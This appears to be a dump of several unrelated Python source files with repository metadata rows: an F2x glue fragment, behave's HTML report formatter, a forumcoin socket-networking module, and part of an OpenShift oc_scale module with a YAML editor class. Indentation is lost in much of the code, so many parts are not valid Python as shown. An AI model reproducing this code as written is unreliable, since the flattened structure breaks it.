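# Minimal sketch of a generated derived-type wrapper (all symbols hypothetical):
#   class Point(FType):
#       _new = constructor(_lib.point_new)
#       _free = destructor(_lib.point_free)
#       x = Field(ctypes.c_double, _lib.point_get_x, _lib.point_set_x)
#   p = Point(x=1.0)   # allocates via _new, then assigns x through the C setter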
class F2xError(Exception):
def __init__(self, name, code):
        super(F2xError, self).__init__("During execution of {0} an error ({1}) occurred.".format(name, code))
self.code = code
|
DLR-SC/F2x
|
src/F2x/template/ctypes_noerr/lib/glue.py
|
Python
|
apache-2.0
| 17,616 | 0.0021 |
# -*- coding: utf-8 -*-
"""
Creates a very basic one-page html file for reporting a test run.
"""
from __future__ import absolute_import
from behave.formatter.base import Formatter
from behave.formatter.css import BasicTheme
from behave.compat.collections import Counter
import xml.etree.ElementTree as ET
import base64
def _valid_XML_char_ordinal(i):
return ( # conditions ordered by presumed frequency
0x20 <= i <= 0xD7FF
or i in (0x9, 0xA, 0xD)
or 0xE000 <= i <= 0xFFFD
or 0x10000 <= i <= 0x10FFFF
)
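# Usage sketch: this predicate is applied below to drop characters that are
# not legal in XML 1.0 before embedding text into the report, e.g.
#   clean = ''.join(c for c in raw_text if _valid_XML_char_ordinal(ord(c)))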
def ET_tostring(elem, pretty_print=False):
text = ET.tostring(elem, "utf-8")
    if pretty_print:
        # Pretty-printing is not implemented here; plain serialization is used.
        pass
return text
class JavaScriptLibrary(object):
collapsible = """
function collapsible_toggle(id)
{
var elem = document.getElementById(id);
elem.style.display = (elem.style.display == 'none' ? 'block' : 'none');
return false;
}
function collapsible_expandAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'block';
i++
}
}
function collapsible_collapseAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'none';
i++
}
}
"""
class Page(object):
"""
Provides a HTML page construct (as technological layer).
XXX
"""
theme = BasicTheme
def __init__(self, title=None):
pass
# -----------------------------------------------------------------------------
# CLASS: HTMLFormatter
# -----------------------------------------------------------------------------
class HTMLFormatter(Formatter):
"""
Provides a single-page HTML formatter that writes the result of a test run.
"""
name = 'html'
description = 'Basic HTML formatter'
title = u"Behave Test Report"
def __init__(self, stream_opener, config):
super(HTMLFormatter, self).__init__(stream_opener, config)
# -- XXX-JE-PREPARED-BUT-DISABLED:
# XXX Seldom changed value.
# XXX Should only be in configuration-file in own section "behave.formatter.html" ?!?
# XXX Config support must be provided.
# XXX REASON: Don't clutter behave config-space w/ formatter/plugin related config data.
# self.css = self.default_css
# if config.css is not None:
# self.css = config.css
self.html = ET.Element('html')
head = ET.SubElement(self.html, 'head')
ET.SubElement(head, 'title').text = self.title
ET.SubElement(head, 'meta', {'content': 'text/html;charset=utf-8'})
style = ET.SubElement(head, 'style', type=u"text/css")
style.text = Page.theme.stylesheet_text
# style.append(ET.Comment(Page.theme.stylesheet_text))
script = ET.SubElement(head, 'script', type=u"text/javascript")
script.text = JavaScriptLibrary.collapsible
# script_text = ET.Comment(JavaScriptLibrary.collapsible)
# script.append(script_text)
self.stream = self.open()
body = ET.SubElement(self.html, 'body')
self.suite = ET.SubElement(body, 'div', {'class': 'behave'})
#Summary
self.header = ET.SubElement(self.suite, 'div', id='behave-header')
label = ET.SubElement(self.header, 'div', id='label')
ET.SubElement(label, 'h1').text = self.title
summary = ET.SubElement(self.header, 'div', id='summary')
totals = ET.SubElement(summary, 'p', id='totals')
self.current_feature_totals = ET.SubElement(totals, 'p', id='feature_totals')
self.scenario_totals = ET.SubElement(totals, 'p', id='scenario_totals')
self.step_totals = ET.SubElement(totals, 'p', id='step_totals')
self.duration = ET.SubElement(summary, 'p', id='duration')
# -- PART: Expand/Collapse All
expand_collapse = ET.SubElement(summary, 'div', id='expand-collapse')
expander = ET.SubElement(expand_collapse, 'a', id='expander', href="#")
expander.set('onclick', "collapsible_expandAll('scenario_steps')")
expander.text = u'Expand All'
cea_spacer = ET.SubElement(expand_collapse, 'span')
cea_spacer.text = u" | "
collapser = ET.SubElement(expand_collapse, 'a', id='collapser', href="#")
collapser.set('onclick', "collapsible_collapseAll('scenario_steps')")
collapser.text = u'Collapse All'
self.embed_id = 0
self.embed_in_this_step = None
self.embed_data = None
self.embed_mime_type = None
self.scenario_id = 0
def feature(self, feature):
if not hasattr(self, "all_features"):
self.all_features = []
self.all_features.append(feature)
self.current_feature = ET.SubElement(self.suite, 'div', {'class': 'feature'})
if feature.tags:
tags_element = ET.SubElement(self.current_feature, 'span', {'class': 'tag'})
tags_element.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), feature.tags)
h2 = ET.SubElement(self.current_feature, 'h2')
feature_element = ET.SubElement(h2, 'span', {'class': 'val'})
feature_element.text = u'%s: %s' % (feature.keyword, feature.name)
if feature.description:
description_element = ET.SubElement(self.current_feature, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), feature.description)
def background(self, background):
self.current_background = ET.SubElement(self.suite, 'div', {'class': 'background'})
h3 = ET.SubElement(self.current_background, 'h3')
ET.SubElement(h3, 'span', {'class': 'val'}).text = \
u'%s: %s' % (background.keyword, background.name)
self.steps = ET.SubElement(self.current_background, 'ol')
def scenario(self, scenario):
if scenario.feature not in self.all_features:
self.all_features.append(scenario.feature)
self.scenario_el = ET.SubElement(self.suite, 'div', {'class': 'scenario'})
scenario_file = ET.SubElement(self.scenario_el, 'span', {'class': 'scenario_file'})
scenario_file.text = "%s:%s" % (scenario.location.filename, scenario.location.line)
if scenario.tags:
tags = ET.SubElement(self.scenario_el, 'span', {'class': 'tag'})
tags.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), scenario.tags)
self.scenario_name = ET.SubElement(self.scenario_el, 'h3')
span = ET.SubElement(self.scenario_name, 'span', {'class': 'val'})
span.text = u'%s: %s' % (scenario.keyword, scenario.name)
if scenario.description:
description_element = ET.SubElement(self.scenario_el, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), scenario.description)
self.steps = ET.SubElement(self.scenario_el, 'ol',
{'class': 'scenario_steps',
'id': 'scenario_%s' % self.scenario_id})
self.scenario_name.set("onclick",
"collapsible_toggle('scenario_%s')" % self.scenario_id)
self.scenario_id += 1
def scenario_outline(self, outline):
        self.scenario(outline)
self.scenario_el.set('class', 'scenario outline')
def match(self, match):
self.arguments = match.arguments
if match.location:
self.location = "%s:%s" % (match.location.filename, match.location.line)
else:
self.location = "<unknown>"
def step(self, step):
self.arguments = None
self.embed_in_this_step = None
self.last_step = step
def result(self, result):
self.last_step = result
step = ET.SubElement(self.steps, 'li', {'class': 'step %s' % result.status})
step_name = ET.SubElement(step, 'div', {'class': 'step_name'})
keyword = ET.SubElement(step_name, 'span', {'class': 'keyword'})
keyword.text = result.keyword + u' '
if self.arguments:
text_start = 0
for argument in self.arguments:
step_text = ET.SubElement(step_name, 'span', {'class': 'step val'})
step_text.text = result.name[text_start:argument.start]
ET.SubElement(step_text, 'b').text = str(argument.value)
text_start = argument.end
step_text = ET.SubElement(step_name, 'span', {'class': 'step val'})
step_text.text = result.name[self.arguments[-1].end:]
else:
step_text = ET.SubElement(step_name, 'span', {'class': 'step val'})
step_text.text = result.name
step_file = ET.SubElement(step, 'div', {'class': 'step_file'})
ET.SubElement(step_file, 'span').text = self.location
self.last_step_embed_span = ET.SubElement(step, 'span')
self.last_step_embed_span.set('class', 'embed')
if result.text:
message = ET.SubElement(step, 'div', {'class': 'message'})
pre = ET.SubElement(message, 'pre', {'style': 'white-space: pre-wrap;'})
pre.text = result.text
if result.table:
table = ET.SubElement(step, 'table')
tr = ET.SubElement(table, 'tr')
for heading in result.table.headings:
ET.SubElement(tr, 'th').text = heading
for row in result.table.rows:
tr = ET.SubElement(table, 'tr')
for cell in row.cells:
ET.SubElement(tr, 'td').text = cell
if result.error_message:
self.embed_id += 1
link = ET.SubElement(step, 'a', {'class': 'message'})
link.set("onclick",
"collapsible_toggle('embed_%s')" % self.embed_id)
link.text = u'Error message'
embed = ET.SubElement(step, 'pre',
{'id': "embed_%s" % self.embed_id,
'style': 'display: none; white-space: pre-wrap;'})
cleaned_error_message = ''.join(
c for c in result.error_message if _valid_XML_char_ordinal(ord(c))
)
embed.text = cleaned_error_message
embed.tail = u' '
if result.status == 'failed':
style = 'background: #C40D0D; color: #FFFFFF'
self.scenario_name.set('style', style)
self.header.set('style', style)
if result.status == 'undefined':
style = 'background: #FAF834; color: #000000'
self.scenario_name.set('style', style)
self.header.set('style', style)
if hasattr(self, 'embed_in_this_step') and self.embed_in_this_step:
self._doEmbed(self.last_step_embed_span,
self.embed_mime_type,
self.embed_data,
self.embed_caption)
self.embed_in_this_step = None
def _doEmbed(self, span, mime_type, data, caption):
self.embed_id += 1
link = ET.SubElement(span, 'a')
link.set("onclick", "collapsible_toggle('embed_%s')" % self.embed_id)
if 'video/' in mime_type:
if not caption:
caption = u'Video'
link.text = unicode(caption)
embed = ET.SubElement(span, 'video',
{'id': 'embed_%s' % self.embed_id,
'style': 'display: none',
'width': '320',
'controls': ''})
embed.tail = u' '
ET.SubElement(embed, 'source', {
'src': u'data:%s;base64,%s' % (mime_type, base64.b64encode(data)),
'type': '%s; codecs="vp8 vorbis"' % mime_type})
if 'image/' in mime_type:
if not caption:
caption = u'Screenshot'
link.text = unicode(caption)
embed = ET.SubElement(span, 'img', {
'id': 'embed_%s' % self.embed_id,
'style': 'display: none',
'src': u'data:%s;base64,%s' % (
mime_type, base64.b64encode(data))})
embed.tail = u' '
if 'text/' in mime_type:
if not caption:
caption = u'Data'
link.text = unicode(caption)
cleaned_data = ''.join(
c for c in data if _valid_XML_char_ordinal(ord(c))
)
embed = ET.SubElement(span, 'pre',
{'id': "embed_%s" % self.embed_id,
'style': 'display: none'})
embed.text = cleaned_data
embed.tail = u' '
def embedding(self, mime_type, data, caption=None):
if self.last_step.status == 'untested':
# Embed called during step execution
self.embed_in_this_step = True
self.embed_mime_type = mime_type
self.embed_data = data
self.embed_caption = caption
else:
# Embed called in after_*
self._doEmbed(self.last_step_embed_span, mime_type, data, caption)
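    # Hedged usage sketch: behave exposes the active formatters on the runner,
    # so an environment hook could call (attribute path assumed, not defined here):
    #   for formatter in context._runner.formatters:
    #       if hasattr(formatter, 'embedding'):
    #           formatter.embedding('image/png', png_bytes, 'Screenshot')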
def close(self):
if not hasattr(self, "all_features"):
self.all_features = []
self.duration.text =\
u"Finished in %0.1f seconds" %\
sum(map(lambda x: x.duration, self.all_features))
# Filling in summary details
result = []
statuses = map(lambda x: x.status, self.all_features)
status_counter = Counter(statuses)
for k in status_counter:
result.append('%s: %s' % (k, status_counter[k]))
self.current_feature_totals.text = u'Features: %s' % ', '.join(result)
result = []
scenarios_list = map(lambda x: x.scenarios, self.all_features)
scenarios = []
if len(scenarios_list) > 0:
scenarios = reduce(lambda a, b: a + b, scenarios_list)
statuses = map(lambda x: x.status, scenarios)
status_counter = Counter(statuses)
for k in status_counter:
result.append('%s: %s' % (k, status_counter[k]))
self.scenario_totals.text = u'Scenarios: %s' % ', '.join(result)
result = []
step_list = map(lambda x: x.steps, scenarios)
steps = []
if step_list:
steps = reduce(lambda a, b: a + b, step_list)
statuses = map(lambda x: x.status, steps)
status_counter = Counter(statuses)
for k in status_counter:
result.append('%s: %s' % (k, status_counter[k]))
self.step_totals.text = u'Steps: %s' % ', '.join(result)
# Sending the report to stream
if len(self.all_features) > 0:
self.stream.write(u"<!DOCTYPE HTML>\n")
self.stream.write(ET_tostring(self.html, pretty_print=True))
|
kymbert/behave
|
behave/formatter/html.py
|
Python
|
bsd-2-clause
| 15,092 | 0.001789 |
import socket, subprocess, re, tools, custom
# This module implements the simple socket networking used to talk to peers.
MAX_MESSAGE_SIZE = 60000
def kill_processes_using_ports(ports):
popen = subprocess.Popen(['netstat', '-lpn'],
shell=False,
stdout=subprocess.PIPE)
(data, err) = popen.communicate()
pattern = "^tcp.*((?:{0})).* (?P<pid>[0-9]*)/.*$"
pattern = pattern.format(')|(?:'.join(ports))
prog = re.compile(pattern)
for line in data.split('\n'):
match = re.match(prog, line)
if match:
pid = match.group('pid')
subprocess.Popen(['kill', '-9', pid])
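# Usage sketch: ports are passed as strings because they are interpolated into
# the regex above, e.g. kill_processes_using_ports(['8888', '8889']).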
def serve_forever(message_handler_func, PORT, queue):
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', PORT))
server.listen(100)
while True:
client, addr = server.accept()
(ip, port) = addr
data = client.recv(MAX_MESSAGE_SIZE)
#we could insert security checks here
try:
            data = tools.unpackage(data)
            client.send(tools.package(message_handler_func(data, queue)))
        except Exception:
            pass
def connect(msg, host, port):
if len(msg)<1 or len(msg)>MAX_MESSAGE_SIZE:
print('wrong sized message')
return
s = socket.socket()
try:
s.settimeout(4)
s.connect((str(host), int(port)))
msg['version']=custom.version
s.send(tools.package(msg))
response = s.recv(MAX_MESSAGE_SIZE)
#print(response)
return tools.unpackage(response)
except Exception as e:
#print('THE ERROR WAS: ' +str(e))
#print('disconnect')
return {'error':e}
def send_command(peer, msg): return connect(msg, peer[0], peer[1])
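# Minimal usage sketch (peer address hypothetical; assumes a node is listening
# and that tools.package/tools.unpackage round-trip the message dict):
#   response = send_command(('127.0.0.1', 8900), {'type': 'ping'})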
|
zack-bitcoin/forumcoin
|
networking.py
|
Python
|
gpl-3.0
| 1,788 | 0.009508 |
#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import fcntl
import json
import time
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/scale -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_scale
short_description: Manage openshift services through the scale parameters
description:
- Manage openshift services through scaling them.
options:
state:
description:
- State represents whether to scale or list the current replicas
required: true
default: present
choices: ["present", "list"]
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: default
aliases: []
kind:
description:
- The kind of object to scale.
required: false
default: None
choices:
- rc
- dc
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: scale down a rc to 0
oc_scale:
name: my-replication-controller
kind: rc
namespace: openshift-infra
replicas: 0
- name: scale up a deploymentconfig to 2
oc_scale:
name: php
kind: dc
namespace: my-php-app
replicas: 2
'''
# -*- -*- -*- End included fragment: doc/scale -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup_ext=None,
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
if backup_ext is None:
self.backup_ext = ".{}".format(time.strftime("%Y%m%dT%H%M%S"))
else:
self.backup_ext = backup_ext
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
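    # Illustrative behaviour of the key helpers above (a sketch; with the
    # default separator '.'):
    #   Yedit.parse_key('a.b[0].c') -> [('', 'a'), ('', 'b'), ('0', ''), ('', 'c')]
    # i.e. each tuple is (array_index, dict_key) with the unused slot empty.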
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def remove_entry(data, key, index=None, value=None, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
if value is not None:
data.pop(value)
elif index is not None:
raise YeditException("remove_entry for a dictionary does not have an index {}".format(index))
else:
data.clear()
return True
elif key == '' and isinstance(data, list):
ind = None
if value is not None:
try:
ind = data.index(value)
except ValueError:
return False
elif index is not None:
ind = index
else:
del data[:]
if ind is not None:
data.pop(ind)
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
        ''' Add an item to a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
            key = a#b, item = c
            result: d['a']['b'] == 'c'
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
            d = {'a': {'b': 'c'}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
fcntl.flock(yfd, fcntl.LOCK_EX | fcntl.LOCK_NB)
yfd.write(contents)
fcntl.flock(yfd, fcntl.LOCK_UN)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, '{}{}'.format(self.filename, self.backup_ext))
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
if self.content_type == 'yaml':
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
elif self.content_type == 'json':
Yedit._write(self.filename, json.dumps(self.yaml_dict, indent=4, sort_keys=True))
else:
raise YeditException('Unsupported content_type: {}.'.format(self.content_type) +
'Please specify a content_type of yaml or json.')
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. {}'.format(err))
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path, index=None, value=None):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, index, value, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
'value=[{}] type=[{}]'.format(value, type(value)))
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is None:
return (False, self.yaml_dict)
# When path equals "" it is a special case.
# "" refers to the root of the document
# Only update the root path (entire document) when its a list or dict
if path == '':
if isinstance(result, list) or isinstance(result, dict):
self.yaml_dict = result
return (True, self.yaml_dict)
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result is not None:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.safe_load(str(invalue))
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
# There is a special case where '' will turn into None after yaml loading it so skip
if isinstance(inc_value, str) and inc_value == '':
pass
# If vtype is not str then go ahead and attempt to yaml load it.
elif isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.safe_load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming value. ' +
'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))
return inc_value
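    # Hedged examples of the coercion above (a sketch, not exhaustive):
    #   Yedit.parse_value('yes', vtype='bool') -> True  (yaml.safe_load coerces it)
    #   Yedit.parse_value('3')                 -> 3     (string yaml-loaded to int)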
@staticmethod
def process_edits(edits, yamlfile):
'''run through a list of edits and process them one-by-one'''
results = []
for edit in edits:
value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
if edit.get('action') == 'update':
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(
Yedit.parse_value(edit.get('curr_value')),
edit.get('curr_value_format'))
rval = yamlfile.update(edit['key'],
value,
edit.get('index'),
curr_value)
elif edit.get('action') == 'append':
rval = yamlfile.append(edit['key'], value)
else:
rval = yamlfile.put(edit['key'], value)
if rval[0]:
results.append({'key': edit['key'], 'edit': rval[1]})
return {'changed': len(results) > 0, 'results': results}
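    # Minimal usage sketch (in-memory document; the key is hypothetical):
    #   yed = Yedit(content={'spec': {'replicas': 1}})
    #   Yedit.process_edits([{'key': 'spec.replicas', 'value': 3}], yed)
    #   -> {'changed': True, 'results': [...]}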
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params):
